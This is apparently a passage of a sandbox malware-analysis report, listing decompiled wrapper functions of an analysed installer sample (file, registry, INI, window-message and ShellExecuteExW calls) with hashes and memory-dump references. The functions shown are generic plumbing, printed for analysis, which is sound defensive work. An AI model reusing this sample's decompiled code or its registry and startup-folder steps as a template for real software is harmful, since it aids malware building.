                                                        0x00402a65
                                                        0x00402a65
                                                        0x00402810
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                          • Part of subcall function 00406193: wsprintfW.USER32 ref: 004061A0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: FilePointerwsprintf
                                                        • String ID:
                                                        • API String ID: 327478801-0
                                                        • Opcode ID: 4643b5bc4f6d9a4cf216ebc2a3e4c5933704e38c523c14cff5c4d3e265dd41fa
                                                        • Instruction ID: 8e859e92f5722eba9353145e96b7f7bbf63091ba891c9fc52d729c0f29c6f3b3
                                                        • Opcode Fuzzy Hash: 4643b5bc4f6d9a4cf216ebc2a3e4c5933704e38c523c14cff5c4d3e265dd41fa
                                                        • Instruction Fuzzy Hash: A0E09271E00104AFDB11EFA5AE498AE7779DB40304B14403BF101F51D2CA790D128E2E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00402306(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402C37(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x24)) != _t11) {
					_t13 = E00402C37(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x18)) != _t11) {
					_t11 = E00402C37(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402C37(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}







                                                        0x00402306
                                                        0x00402306
                                                        0x00402308
                                                        0x0040230c
                                                        0x0040230f
                                                        0x00402314
                                                        0x00402319
                                                        0x00402322
                                                        0x00402322
                                                        0x00402327
                                                        0x00402330
                                                        0x00402330
                                                        0x0040233d
                                                        0x004015b4
                                                        0x004015b6
                                                        0x00402885
                                                        0x00402885
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                        • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                        • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                        • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004060E7 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004060E7(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040603E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                        0x004060f1
                                                        0x004060fa
                                                        0x00406110
                                                        0x00000000
                                                        0x00406110
                                                        0x004060fe
                                                        0x00000000

                                                        APIs
                                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406110
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        • API String ID: 2289755597-0
                                                        • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                        • Instruction ID: 2d66df08b7a29efef6dff9ba5d381340db71bdfba6c3c9a2337d9ff24a0a933a
                                                        • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                        • Instruction Fuzzy Hash: 3FE0E672120109BEEF199F90DD0BD7B371DE704344F11452EFA06D4051E6B6A9309A78
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405DC1 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405DC1(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                        0x00405dc5
                                                        0x00405dd5
                                                        0x00405ddd
                                                        0x00000000
                                                        0x00405de4
                                                        0x00000000
                                                        0x00405de6

                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032F2,00000000,00000000,00403149,?,00000004,00000000,00000000,00000000), ref: 00405DD5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                        • Instruction ID: 049d94eeec1c3219778d14f023c81a0d93a8da43d693805162a6c59e2ada833e
                                                        • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                        • Instruction Fuzzy Hash: C8E0EC3221125AABDF10AF559C04EEB7B6CEF05760F048837F915E6150D631E8619BA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405DF0 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405DF0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                        0x00405df4
                                                        0x00405e04
                                                        0x00405e0c
                                                        0x00000000
                                                        0x00405e13
                                                        0x00000000
                                                        0x00405e15

                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032C0,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E04
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                        • Instruction ID: 615bc9b617cbd9c004defc23c3f46b4eb24d278b47416a1e56efd721f2399a3b
                                                        • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                        • Instruction Fuzzy Hash: 1AE0EC3262465AABDF10AF55DC00AEB7B6CFB453A0F004836FD55E3150D671EA219BE8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004060B9 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004060B9(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E0040603E(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}






                                                        0x004060c3
                                                        0x004060ca
                                                        0x004060dd
                                                        0x00000000
                                                        0x004060dd
                                                        0x004060ce
                                                        0x00000000

                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406147,?,00000000,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?), ref: 004060DD
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                        • Instruction ID: 58905e2b4c491557ae101ac833ec4d98e5c4c38dddbb54ebc3676a7d29ad937b
                                                        • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                        • Instruction Fuzzy Hash: 90D0123204020DBBDF119E90ED01FAB3B1DAB04750F014426FE16A5090D775D570AB14
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                        0x004015ae
                                                        0x004015b4
                                                        0x004015b6
                                                        0x00402885
                                                        0x00402885
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: d6d9806800ec5ccd533d2c0c0804cc6b52acb563155f8df96d71c34e139e9099
                                                        • Instruction ID: 98fc1d19ac344296b2804d9baf38034e6035577dbf93b3ceff4c84e4d608f923
                                                        • Opcode Fuzzy Hash: d6d9806800ec5ccd533d2c0c0804cc6b52acb563155f8df96d71c34e139e9099
                                                        • Instruction Fuzzy Hash: 85D01272B04104DBDB21DBA4AF0859E72A59B10364B204677E101F11D1DAB989559A59
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040422D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0040422D(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x4291d8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                        0x0040422d
                                                        0x00404234
                                                        0x0040423f
                                                        0x00000000
                                                        0x0040423f
                                                        0x00404245

                                                        APIs
                                                        • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040423F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                        • Instruction ID: d07d2c2d8c4880ed0075d79043221f50ab42e2b574db457b7482678080f727f2
                                                        • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                        • Instruction Fuzzy Hash: 42C04C717402017BEA208B519D49F1677549790B40F1484797740E50E0D674E450D62C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405874 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00405874(struct _SHELLEXECUTEINFOW* _a4) {
				struct _SHELLEXECUTEINFOW* _t4;
				int _t5;

				_t4 = _a4;
				_t4->lpIDList = _t4->lpIDList & 0x00000000;
				_t4->cbSize = 0x3c; // executed
				_t5 = ShellExecuteExW(_t4); // executed
				return _t5;
			}





                                                        0x00405874
                                                        0x00405879
                                                        0x0040587d
                                                        0x00405883
                                                        0x00405889

                                                        APIs
                                                        • ShellExecuteExW.SHELL32(?), ref: 00405883
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID:
                                                        • API String ID: 587946157-0
                                                        • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                        • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                        • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                        • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00404216(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x42a208, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                        0x00404224
                                                        0x0040422a

                                                        APIs
                                                        • SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
